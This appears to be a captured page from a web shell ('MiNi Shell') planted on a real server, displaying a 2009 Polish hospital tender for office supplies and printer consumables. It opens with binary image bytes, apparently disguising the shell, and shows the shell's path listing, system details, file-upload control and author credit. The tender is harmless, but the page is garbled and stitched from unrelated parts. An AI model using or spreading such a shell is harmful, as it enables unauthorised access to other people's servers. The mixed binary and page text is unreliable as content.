JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/326428-N-2009.html

<p class="kh_header"><b>Legnica: Dostawa artykułów biurowych, nośników danych taśm i tuszy do drukarek dla Wojewódzkiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 326428 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny w Legnicy , ul. J. Iwaszkiewicza 5, 59-220 Legnica, woj. dolnośląskie, tel. (076) 721 11 26, faks (076) 721 11 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych, nośników danych taśm i tuszy do drukarek dla Wojewódzkiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa opisanych w :
Pakiecie 1 - Artykułów papierniczych
Pakiecie 2 - Artykułów do pisania
Pakiecie 3 - Artykułów biurowych wykonanych z elementów metalowych
Pakiecie 4 - Artykułów biurowych wykonanych z plastiku
Pakiecie 5 - Artykułów biurowych - NA POZYCJE
Pakiecie 6 - Nośników danych
Pakiecie 7 - Folii do narzędzi biurowych
Pakiecie 8 - Taśm klejących
Pakiecie 9 - Taśm do drukarek
Pakiecie 10 - Papierów i taśm do narzędzi
Pakiecie 11 - Tuszy do drukarek.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w at. 22 ust. 1 . pkt 1-4 ustawy Prawo zamówień publicznych tj.:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obo-wiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP

Ocena spełnienia w/w warunków, dokonana zostanie zgodnie z formułą spełnia / nie spełnia w oparciu o infor-macje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt X.A SIWZ. Z treści dokumentów musi jednoznacznie wynikać, iż w/w  warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A)
Na potwierdzenie spełnienia warunków, o których mowa w pkt. IX,  wykonawca zobowiązany jest złożyć:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalno-ści gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczy-pospolitej Polskiej zamiast  dokumentów, o których mowa, składa dokument lub dokumenty wy-stawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upły-wem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów, zastępuje się je dokumen-tem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, admi-nistracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pocho-dzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z treścią załącznika nr 1 do niniejszej SIWZ
B)
Inne dokumenty, które należy dołączyć do oferty

1.	Wypełniony druk oferty stanowiący załącznik nr 3
2.	Wypełniony i podpisany przez Wykonawcę  formularz ofertowy

Wszystkie dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgod-ność z oryginałem przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy. Jeżeli upoważnienie do złożenia oferty nie wynika z dokumentów wymienionych w punkcie  X.I. A ppkt 1 specyfikacji należy dołączyć stosowne pełnomocnictwo.

W przypadku składnia oferty przez podmioty występujące wspólnie (konsorcja , spółki cywilne)należy dołączyć dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Wykonawcy składający ofertę wspólną zobowiązani są do złożenia dokumentów obowiązujących dla każdego wykonawcy z osobna tj.: wy-mienione w pkt. X.A.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.legnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny w Legnicy, ul. Iwaszkiewicza 5, 59-220 Legnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2009 godzina 11:00, miejsce: sekretariat w siedzibie Zamawiającego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Formularz nr 1 - artykuły papiernicze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bibuła karbowana kolorowa 45x56 /	szt	18
2	BLOK MAKULATUROWY FORMAT  A4 100 kart/KRATKA	szt	180
3	BLOK RYSUNKOWY FORMAT A4	szt	12
4	BLOK TECHNICZNY A4 FORMAT  A4 Z KOLOROWEGO BRYSTOLU	szt	6
5	BLOK TECHNICZNY A4 FORMAT  A4 Z BIAŁEGO BRYSTLOU	szt	6
6	KALKA OŁÓWKOWA FORMAT  A4 /op 25 ARKUSZY/	op	48
7	KOPERATA   RTG wym.370x450 szara,brązowa,klejona na mokro	szt	9000
8	KOPERTA    C-6 wym. 114x162mm,szara,brązowa,klejona na mokro,otwierana na krótszym boku	szt	500
9	KOPERTA   C-4 wym. 229x324 mm szara,brązowa,  klejona na mokro	szt	9000
10	KOPERTA  C-5 wym. 162x229mmszara,brązowa,klejona na mokro	szt	9000
11	KOPERTA C6  wym. 114x162mm LISTOWA  BIAŁA,KLEJONA NA MOKRO	szt	12000
12	NOTATNIK  FORMAT  A4 TWARDA OPRAWA /kratka/ 96 kartek	szt	300
13	PAPIER  KSERO FORMAT  A3 gramatura 80g/m2	op	36
14	PAPIER KOMPUTEROWY - DWUWARSTWOWY 240 mmx12mm 	op	36
15	PAPIER KOMPUTEROWY - TRZYWARSTWOWY 240 mmx12mm 	op	24
16	PAPIER KSERO FORMAT  A4 /210X297MM/ gramatura 80g/m2  op 500szt	op	2470
17	PAPIER KSERO KOLOR  FORMAT  A4 /210X297MM/ gramatura 80g/m2  op 500szt	op	24
18	PAPIER OKOLICZNOŚCIOWY 	op	8
19	SEGREGATOR  Z OKUCIEM FORMAT  A4 	szt	360
20	SKOROSZYT PLAST.KOLOR FORMAT  A4 	szt	300
21	SKOROSZYT PAP. ZAWIESZANA FORMAT  A4 cała lub zawieszana	szt	2000
22	SKOROWIDZ FORMAT  A4  / 100 kartek/	szt	20
23	SKOROWIDZ FORMAT A-5 /100 kartek/	szt	12
24	TECZKA GRATULACYJNA	szt	20
25	TECZKA  PAPIEROWA WIĄZANA FORMAT A4	szt	3000
26	ZESZYT A5 KRATKA/ 16 KARTKOWY	szt	80
27	ZESZYT A5 KRATKA/ 32 KARTKOWY	szt	240
28	ZESZYT A5 KRATKA/ 60 KARTKOWY	szt	320
29	ZESZYT A5 KRATKA/ 96 KARTKOWY/TWARDA OPRAWA	szt	180.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Formularz nr 2 - artykuły do pisania.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	CIENKOPIS KOLOROWY plastikowa końcówka oprawiona w metal, grubość linii pisania 0,4 mm	szt	1100
2	DŁUGOPIS ZWYKŁY	szt	36
3	MARKER DO TABLIC  suchościeralny, czarny	szt	1000
4	MARKER OLEJOWY czarny, biały,cienko piszący	szt	50
5	MARKER WODOODPORNY z atramentem na bazie alkoholu
do zastosowania na metalu,szkle,plastiku 	szt	1080
6	OŁÓWEK  METALIZOWANY Z GUMKĄ /HB średnia twardość /	szt	72
7	WKŁAD  DŁUGOPISOWY  ZWYKŁY/NIEBIESKI,CZARNY,CZERWONY/KOŃCÓWKA ZENIT	szt	250
8	ZAKREŚLACZ  RÓŻNE KOLORY /SKOŚNIE ŚCIĘTY	szt	120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Formularz nr 3 - Artykuły biurowe wykonane z elementów metalowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	DZIURKACZ BIUROWY - wykonany z metalu,wskaźnik środka kartki /dziurkowanie do 10 kartek/	szt	24
2	NOŻYCZKI BIUROWE 	szt	5
3	PINEZKI metalowe     /1opak. 100 szt/	op	50
4	SPINACZE  BIUROWE DUŻE   50SZT	op	60
5	SPINACZE  BIUROWE MAŁE  100 szt.	op	600
6	ZSZYWACZ wykonany z metalu, na zszywki NR 24/6	szt	24
7	ZSZYWKI NR 24/6    1op. - 1000 szt. METALOWE	op	600
8	ZSZYWKI NR 10   1op. - 1000 szt. METALOWE	op	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Formularz nr 4 - Artykuły biurowe wykonane z plastiku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ofertówki foliowe - koszulki na dokumenty przeźroczyste groszkowe format A4 /od 40mic do 65mic/	szt	9600
2	Ofertówki foliowe - koszulki na dokumenty przeźroczyste groszkowe format A4 /od 105mic do 120mic /	szt	120
3	TECZKA PLASTIKOWA WIĄZANA FORMAT A-4	szt	120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Formularz nr 5 - Artykuły  biurowe różne -na pozycje.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	CYFRY SAMOPRZYLEPNE ROZM OD 1-DO 5CM /1 arkusz- cały komplet 	szt	20
2	DATOWNIK SAMOTUSZUJĄCY AUTYMATYCZNY PLASTIKOWY TAŚMOWY Z TAŚMOWYMI ZESTAWAMI DNI,MIESIĘCY,LAT DO RĘCZNEGO NASTAWIANIA /CZCIONKA 4MM/	szt	5
3	Farby akwarelowe do malowania na papierze/zestaw 6,12 kolorów/	op	2
4	Farby plakatowe /zestaw 6,12 kolorów/	op	5
5	KLEJ  SZKOLNY BIAŁY W  TUBCE,50G	szt	62
6	KOREKTOR  W PĘDZELKU BIAŁY w płynie,szybkoschnący	szt	360
7	KREDKI ŚWIECOWE 12 kolorów 1op=12szt	op	10
8	KSIĄŻKA KANCELARYJNA FORMAT  A4 w twardej oprawie, 100 lub 192 kartki	szt	10
9	LITERY SAMOPRZYLEPNE ROZM OD 1-DO 5CM /1 arkusz- cały komplet 	szt	20
10	NAKLEJKI Z PAPIERU WODOODPORNEGO BIAŁE 	op	1
11	PĘDZEL SZKOLNY,różne wielkości	szt	10
12	PLASTELINA 	op	10
13	PODUSZKA DO STEMPLI nasączona rozmiar 50x90mm lub 110X70mm	szt	24
14	SZNUREK PAKOWY	szt	100
15	TABLICZKI PLAST. Z NAZWĄ ODDZIAŁU NA WÓZKI	szt	60
16	TECZKA  DO  PODPISU FORMAT  A4 TWARDA  OPRAWA /10 PRZEKŁADEK/	szt	10
17	TECZKA KIEROWCY B5 	szt	7
18	TUSZ DO PIECZĄTEK  CZERWONY,ZIELONY GRANAT	szt	120
19	WKŁAD /PODUSZKA/ DO NUMERATORA	szt	2
20	WIZYTÓWKI DO OZNACZENIA DIET DLA PACJENTÓW /RÓŻNE KOLORY/	szt	400
21	Wycinanka	szt	15.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Formularz nr 6 - Nośniki danych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	DYSKIETKA 10 szt w  opakowaniu	op	5
2	NAKLEJKI NA DYSKIETKI 	arkusz	100
3	PŁYTA KOMP. CD-R  CD 700 MB	szt	120
4	PŁYTA KOMP. DVD	szt	150
5	PŁYTA KOMP.CD-RW	szt	60
6	PŁYTA ZIP 250 MB  OMEGA	szt	2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Formularz nr 7 - Folie do narzędzi biurowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	FOLIA DO KSEROKOPIAREK LX  FORMAT  A4  na foliogram światłoczuła GRUBOŚĆ  0,10 mm	szt	40
2	FOLIA DO LAMINOWANIA FORMAT  A4 GRUBOŚĆ  80 mm, 120 mm, 200 mm	op	10
3	FOLIA KX-FAKS do drukarek na foliogram FORMAT  A4 	szt	12.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Formularz nr 8 - Taśmy klejące.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	TAŚMA  GĘSIA  SKÓRKA BIAŁA	szt	100
2	TAŚMA  SAMOPRZYLEPNA PRZEŹROCZYSTA wym.18mmX20m lub 19mmx33m	szt	240
3	TAŚMA  SAMOPRZYLEPNA DWUSTRONNIE KLEJĄCA wym.50mmx10m	szt	36
4	TAŚMA PAKOWA KLEJĄCA  SZARA 48X50	szt	113
5	TAŚMA PAKOWA KLEJĄCA  BIAŁA 48X50	szt	24
6	TAŚMA PAKOWA KLEJĄCA  PRZEŹROCZYSTA  48X50	szt	24.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Formularz nr 9 - Taśmy do drukarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	TAŚMA  DO DRUKARKI  EPSON LX-100	szt	3
2	TAŚMA  DO DRUKARKI  EPSON  DFX 5000/8000	szt	3
3	Taśma do drukarki   LEXMARK 11A 3540 , 2381	szt	12
4	Taśma do drukarki OKI  320/520	szt	17
5	Taśma do drukarki Epson LQ 400/800	szt	2
6	Taśma do drukarki PANASONIC KXP 2130	szt	4
7	Taśma do drukarki FUJITSU DL 1100/900/1200	szt	10
8	Taśma do drukarki BROTHER-SAMSUNG 100	szt	5
9	Taśma do drukarki APPOLLO /OLIMPIA/2.MD/SN	szt	1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Formularz nr 10 - Papier i taśmy do narzędz.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	PAPIER DO FAXU W ROLCE / wym. 210mmx30mm	szt	142
2	ROLKA BARWIĄCA  IR-40 DO MASZYNKI LICZĄCEJ 	szt	5
3	ROLKA/TAŚMA/ TERMICZNA wym. 57MMX30MM	szt	200
4	ROLKA/TAŚMA/ TERMICZNA DO KASY FISKALNEJ wym. 28mmX30mm	szt	480
5	TAŚMA  KASOWA Dalton  57mm x 30mm	szt	24
6	Taśma do metkownicy /700 etykiet/rolka/ - biała	szt	360
7	Taśma do metkownicy /700 etykiet/rolka/ - biała,czerwona,zielona,żółta	szt	24.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Formularz nr 11 - Tusz do drukarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	TUSZ DO DRUKARKI  XEROX M-750- CZARNY 	szt	20
2	TUSZ DO DRUKARKI HEWLETT PACKARD Q G 95-CZARNY	szt	4
3	TUSZ DO DRUKARKI HEWLETT PACKARD  840/920 C  6615/ CZARNY/	szt	5
4	TUSZ DO DRUKARKI HEWLETT PACKARD 695 C -CZARNY	szt	4
5	TUSZ DO DRUKARKI HEWLETT PACKARD  600 (51629A)/CZARNY	szt	5
6	TUSZ DO DRUKARKI HEWLETT PACKARD 3680-21-CZARNY ZASTĘPCZY 54	szt	24
7	TUSZ DO DRUKARKI HEWLETT PACKARD PSC 1215-27 ZASTĘPCZY 56	szt	12
8	TUSZ DO DRUKARKI HEWLETT PACKARD PSC 1215-28  ZASTĘPCZY 57	szt	12
9	TUSZ DO DRUKARKI HEWLETT PACKARD 3680-22 -  KOLOR  	szt	12
10	TUSZ DO DRUKARKI HEWLETT PACKARD DJ 95 -KOLOR	szt	2
11	TUSZ DO DRUKARKI HEWLETT PACKARD DJ 970 CXI-CZARNY	szt	6
12	TUSZ DO DRUKARKI HEWLETT PACKARD DJ 970 CXI-KOLOR	szt	2
13	TUSZ DO DRUKARKI LEXMARK 3200-12A1980-KOLOR	szt	5
14	TUSZ DO DRUKARKI LEXMARK 3200-12A1970-CZARNY 	szt	14
15	TUSZ DO DRUKARKI LEXMARK P 6250-CZARNY	szt	6
16	TUSZ DO DRUKARKI LEXMARK X 6150 -KOLOR	szt	1
17	TUSZ DO DRUKARKI LEXMARK X 6150 -CZARNY	szt	4
18	TUSZ DO DRUKARKI LEXMARK 1020-CZARNY	szt	2
19	TUSZ DO DRUKARKI LEXMARK  612 Z-CZARNY	szt	6
20	TUSZ DO DRUKARKI LEXMARK 12 Z-CZARNY	szt	6
21	TUSZ DO DRUKARKI LEXMARK  617 Z-KOLOR	szt	2
22	TUSZ DO DRUKARKI LEXMARK  617 Z- CZARNY 	szt	5
23	TUSZ DO DRUKARKI LEXMARK  Z-735 18C	szt	3
24	TUSZ DO DRUKARKI XEROX M-750-PURPURA 	szt	5
25	TUSZ DO DRUKARKI XEROX M-750 -NIEBIESKI	szt	5
26	TUSZ DO DRUKARKI XEROX M-750-ŻÓŁTY	szt	5
27	TUSZ DO DRUKARKI  HEWLETT PACKARD CANON PIXMA 1500	szt	12
28	TUSZ DO DRUKARKI  HEWLETT PACKARD CANON PIXMA 3600 w kpl/czarny,czerwony,niebieski,żółty/	szt	4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com